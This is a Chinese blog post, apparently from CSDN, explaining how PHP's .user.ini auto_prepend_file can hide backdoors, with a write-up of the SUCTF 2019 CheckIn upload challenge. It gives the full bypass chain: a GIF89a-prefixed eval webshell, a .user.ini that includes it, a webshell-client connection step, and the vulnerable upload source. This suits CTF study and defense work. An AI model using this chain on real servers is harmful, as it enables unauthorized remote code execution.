[文件上传]浅析.user.ini的利用

最新推荐文章于 2024-04-18 22:13:08 发布
最新推荐文章于 2024-04-18 22:13:08 发布
阅读量6.9k 收藏 27
点赞数 8
分类专栏: 刷题记录 Web安全 文章标签: php nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/120793126
版权

.user.ini

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门。

实例

php 配置项中有两个配置可以起到一些作用

auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

这两个配置项的作用相当于一个文件包含,比如

// .user.ini
auto_prepend_file = 1.jpg
// 1.jpg
<?php phpinfo();?>
// 1.php(任意php文件)

满足这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含。

另一条配置包含在文件尾,如果遇到了 exit 语句的话就会失效。

.user.ini使用范围很广,不仅限于 Apache 服务器,同样适用于 Nginx 服务器,只要服务器启用了 fastcgi 模式 (通常非线程安全模式使用的就是 fastcgi 模式)。

局限

.user.ini中使用这条配置也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。

但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。

[SUCTF 2019]CheckIn

image-20211016001615524

进入之后是一个文件上传页面,php文件被过滤,尝试上传png图片马

image-20211016001818780

过滤了<?

<script language="php">eval($_POST['1']);</script>

修改为script形式

提示exif_imagetype:not image!

exif_imagetype

(PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8)

exif_imagetype — 判断一个图像的类型

说明
exif_imagetype(string $filename): int

exif_imagetype() 读取一个图像的第一个字节并检查其签名。

​ 本函数可用来避免调用其它 exif函数用到了不支持的文件类型上或和 $_SERVER['HTTP_ACCEPT']结合使用来检查浏览器是否可以显示某个指定的图像。

GIF89a图片头欺骗

GIF89a
<script language="php">eval($_POST['1']);</script>

上传成功,但无法被解析运行

.user.ini

第一步

GIF89a
auto_prepend_file = 1.jpg

第二步:上传1.jpg

GIF89a
<script language="php">eval($_POST['1']);</script>

第三步

上传完成

image-20211016003914319

连接蚁剑

image-20211016003834653

源码

<?php
// error_reporting(0);
$userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]);
if (!file_exists($userdir)) {
    mkdir($userdir, 0777, true);
}
file_put_contents($userdir . "/index.php", "");
if (isset($_POST["upload"])) {
    $tmp_name = $_FILES["fileUpload"]["tmp_name"];
    $name = $_FILES["fileUpload"]["name"];
    if (!$tmp_name) {
        die("filesize too big!");
    }
    if (!$name) {
        die("filename cannot be empty!");
    }
    $extension = substr($name, strrpos($name, ".") + 1);
    if (preg_match("/ph|htacess/i", $extension)) {
        die("illegal suffix!");
    }
    if (mb_strpos(file_get_contents($tmp_name), "<?") !== FALSE) {
        die("&lt;? in contents!");
    }
    $image_type = exif_imagetype($tmp_name);
    if (!$image_type) {
        die("exif_imagetype:not image!");
    }
    $upload_file_path = $userdir . "/" . $name;
    move_uploaded_file($tmp_name, $upload_file_path);
    echo "Your dir " . $userdir. ' <br>';
    echo 'Your files : <br>';
    var_dump(scandir($userdir));
}

参考:

https://juejin.cn/post/6844903571876478989

https://xz.aliyun.com/t/6091

Snakin_ya
关注
  • 8
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
全生命周期BOM管理浅析.pdf
11-04
全生命周期BOM管理浅析.pdf
CAD电子文件管理及利用浅析.pdf
08-04
CAD电子文件管理及利用浅析.pdf
文件上传-.user.ini的妙用
A_991128a的博客
04-14 766
小伙伴们大家好!本期为大家带来的是在文件上传漏洞中的妙用。.user.ini.user.ini的妙用原理利用.user.ini的环境实战演示​1、先尝试直接上传webshell2、看是否能够上传除php和png外的文件3、上传.user.ini文件4、再次尝试上传webshell5、测试上传的.user.ini与webshell是否能够正常生效6、使用连接工具连接webshell。
upload靶场第五关 超详细两种绕过方法(含.ini绕过)
2301_79650865的博客
02-02 1179
upload靶场第五关 两种超详细绕过方式!包含.user.ini绕过方法及知识点
文件上传漏洞】user.ini留后门
weixin_53146913的博客
05-18 4347
一、什么是.user.iniphp.iniphp默认的配置文件。其中包含四种配置, 在PHP_INI_USER的配置项中,提到.user.ini。 这里作用解释如下: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 .user.iniPHP 支持基于每个目录的 I
文件上传漏洞中的.user.ini文件
最新发布
weixin_65279640的博客
04-18 946
因此,正确配置 PHP 和服务器权限,以及限制对上传目录的访问,是非常重要的。文件允许用户为特定目录定义 PHP 配置指令,这些配置指令将在该目录及其所有子目录中的 PHP 脚本执行时生效。这样,不同的应用程序或用户可以在自己的目录中设置特定的 PHP 配置,而不影响整个服务器的配置。文件是 PHP 中用于配置特定目录的设置的特殊文件。如果服务器上的 PHP 没有正确配置,那么每当有 PHP 文件在这个目录下被访问时,文件到 PHP 服务器上,他们可能会利用这个文件来改变服务器的配置,例如修改。
php user.ini详解
HAI_WD的博客
08-25 1842
本篇主要是讲解分析一下user.ini相关的内容。因为这个知识点涉及到文件上传的绕过。
web buuctf [SUCTF 2019]CheckIn1
weixin_44214568的博客
03-15 1512
如图,应该是一个文件上传的题目; 1.上传一句话木马: 上传php文件,提示illegal suffix!(非法后缀),改一下后缀,php3,phtml,Php都是一样的提示,应该是对文件后缀进行了过滤 改成jpg格式的提示exif_imagetype:not image!,后台函数进行了过滤 2.改文件头GIF89a?<script language="php">eval($_post['a']);</script> 上传后提示 能够看到文件上传的路径,和文件所在位..
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2812
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
.user.ini 作用和配置
曹品东
09-02 927
.htaccess是伪静态环境配置文件,用于lamp。 .user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取. 配置 放在根目录 .user.ini open_basedir=/项目路径/:/tmp/:/proc/ 例: open_basedir=/www/aaa/:/tmp/:/proc/ 测试: 没加的时候可以直接读到根目录的文件 加上之后: 就什么也读不到了 ...
Director软件导入Photoshoppsd文件浅析.doc
06-28
Director软件导入Photoshoppsd文件浅析
社会学视角下的网络流行语浅析.docx
05-11
社会学视角下的网络流行语浅析.docx
神秘的.user.ini文件
李否否
10-13 7155
.user.ini究竟是个神秘东东?我们看看官方怎么说: http://php.net/manual/zh/configuration.file.per-user.phpPHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用
lnmp环境下无法删除.user.ini文件的解决方法
梓逸宸的博客
02-17 1213
有一次我使用命令lnmp vhost del删除虚拟主机后,需要使用rm命令删除网站目录,但是却发现网站目录下有个文件.user.ini文件没有自动删除,出现提示: rm: cannot remove `http://xxx.com/.user.ini’: Operation not permitted, 连手动ftp也无法删除。 问题分析: 根据上面的提示判断文件权限已经被锁...
lnmp无法删除.user.ini
热门推荐
php小松
01-31 1万+
在Linux里删除目录的时候发现没有办法删除,最后一个一个文件删除,发现是.user.ini文件的问题 删除的是提示 rm: cannot remove `.user.ini': Operation not permitted 无法删除“.user.ini”文件解决方法,运行后删除即可 文件可以修改 chattr -i .user.ini 文件不能修改 chattr +i .user.ini c
.user.ini文件
benben0729的专栏
03-14 1025
官方介绍 自 PHP 5.3.0 起,PHP 支持基于每个目录的 .htaccess 风格的 INI 文件。此类文件仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果使用 Apache,则用 .htaccess 文件有同样效果。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一...
浅析scipy.signal.find_peaks()
06-01
`scipy.signal.find_peaks()` 是一个用于查找一维信号中峰值(peak)的函数。它可以找到信号中的所有局部峰值,并返回它们的位置及峰值高度等信息。 该函数的语法如下: ``` peaks, _ = find_peaks(signal, **kwargs) ``` 其中,`signal` 是要查找峰值的一维信号,`peaks` 是一个 NumPy 数组,包含所有的峰值位置。`**kwargs` 则是可选的参数,用于指定查找峰值的方式。 `scipy.signal.find_peaks()` 支持多种不同的查找峰值的方式,包括: - `height`:指定峰值的最小高度。 - `distance`:指定峰值之间的最小距离。 - `prominence`:指定峰值的 prominence(即峰值高度与其它峰值的高度之差的最小值)。 - `width`:指定峰值的宽度范围。 例如,下面的代码可以使用 `height` 和 `distance` 来查找信号中的所有峰值: ``` from scipy.signal import find_peaks import numpy as np signal = np.random.rand(100) peaks, _ = find_peaks(signal, height=0.5, distance=10) ``` 在这个例子中,`height` 参数指定了峰值的最小高度为 0.5,`distance` 参数指定了峰值之间的最小距离为 10。 总的来说,`scipy.signal.find_peaks()` 是一个非常实用的函数,可以在很多领域中使用,例如信号处理、机器学习等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值